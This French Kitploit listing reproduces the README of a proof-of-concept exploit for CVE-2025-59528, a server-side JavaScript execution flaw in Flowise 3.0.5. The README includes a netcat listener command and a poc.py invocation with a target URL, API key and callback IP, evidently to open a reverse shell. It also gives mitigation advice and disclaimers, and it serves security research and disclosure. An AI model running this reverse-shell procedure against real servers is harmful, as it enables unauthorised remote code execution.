Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-59528-PoC — The poc of CVE-2025-59528 | Kitploit
Outils/GitHubGitHub/sonnelon/cve-2025-59528-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsonnelon/cve-2025-59528-poc

CVE-2025-59528-PoC

The poc of CVE-2025-59528

Voir le dépôt
il y a 10 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-59528 PoC

Preuve de concept pour la recherche de CVE-2025-59528 dans un environnement de laboratoire isolé.

[!WARNING] AVERTISSEMENT

Ce projet est destiné strictement à des fins éducatives, à la recherche en sécurité et aux tests de systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite.

N'utilisez pas ce PoC contre des serveurs tiers, des services publics ou des infrastructures sans l'autorisation du propriétaire.

L'auteur n'est pas responsable des dommages, pertes de données, interruptions de service ou conséquences juridiques résultant d'une mauvaise utilisation de ce projet.

Description

Ce PoC démontre l'impact potentiel de CVE-2025-59528, une vulnérabilité impliquant le traitement de mcpServerConfig contrôlé par l'utilisateur dans Flowise.

Dans certaines conditions, la vulnérabilité peut permettre à un attaquant d'exécuter du code JavaScript arbitraire dans le contexte côté serveur.

Versions affectées

  • Flowise 3.0.5

Version corrigée

  • Flowise 3.0.6+

Vérifiez toujours la version exacte de l'installation cible avant de tester.

Prérequis

  • Python 3
  • requests
  • Une instance de test Flowise locale ou isolée
  • Un compte autorisé disposant des permissions requises

Installez la dépendance Python :

root@kitploit:~
pip install requests

Utilisation

Exécutez netcat pour obtenir un shell :

root@kitploit:~
nc -lvnp <YOUR_PORT>

Exécutez le PoC avec :

root@kitploit:~
python3 poc.py \
    -t http://TARGET:PORT \
    -o api_key \
    -i CALLBACK_IP \
    -p CALLBACK_PORT

Arguments

Configuration du laboratoire

Les tests doivent être effectués dans un réseau virtuel ou de laboratoire isolé.

root@kitploit:~
┌──────────────────┐
│    PoC Machine   │
│                  │
│    Python PoC    │
└────────┬─────────┘
         │
         │ Isolated Network
         │
┌────────▼─────────┐
│   Flowise 3.0.5  │
│   Test Instance  │
└──────────────────┘

N'exposez pas une instance Flowise volontairement vulnérable directement sur l'Internet public.

Atténuation

Si vous exécutez une version affectée de Flowise :

  1. Mettez à niveau Flowise vers une version corrigée.
  2. Restreignez l'accès aux API administratives.
  3. Évitez d'accorder aux utilisateurs non fiables les permissions requises pour accéder aux fonctionnalités vulnérables.
  4. Examinez les journaux du serveur pour détecter les requêtes suspectes.
  5. Retestez l'installation après la mise à niveau.

Références

  • CVE : CVE-2025-59528
  • Logiciel affecté : Flowise
  • Version corrigée : 3.0.6+

Avis juridique

En utilisant ce projet, vous reconnaissez que vous êtes seul responsable du respect de toutes les lois et réglementations applicables.

N'utilisez ce PoC que contre des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite d'effectuer des tests de sécurité.

Télécharger l’outil
ArgumentDescription
-t, --targetURL de l'instance de test Flowise
-o, --api_keyClé API
-i, --ipAdresse IP de la machine de test
-p, --portPort utilisé par l'environnement de test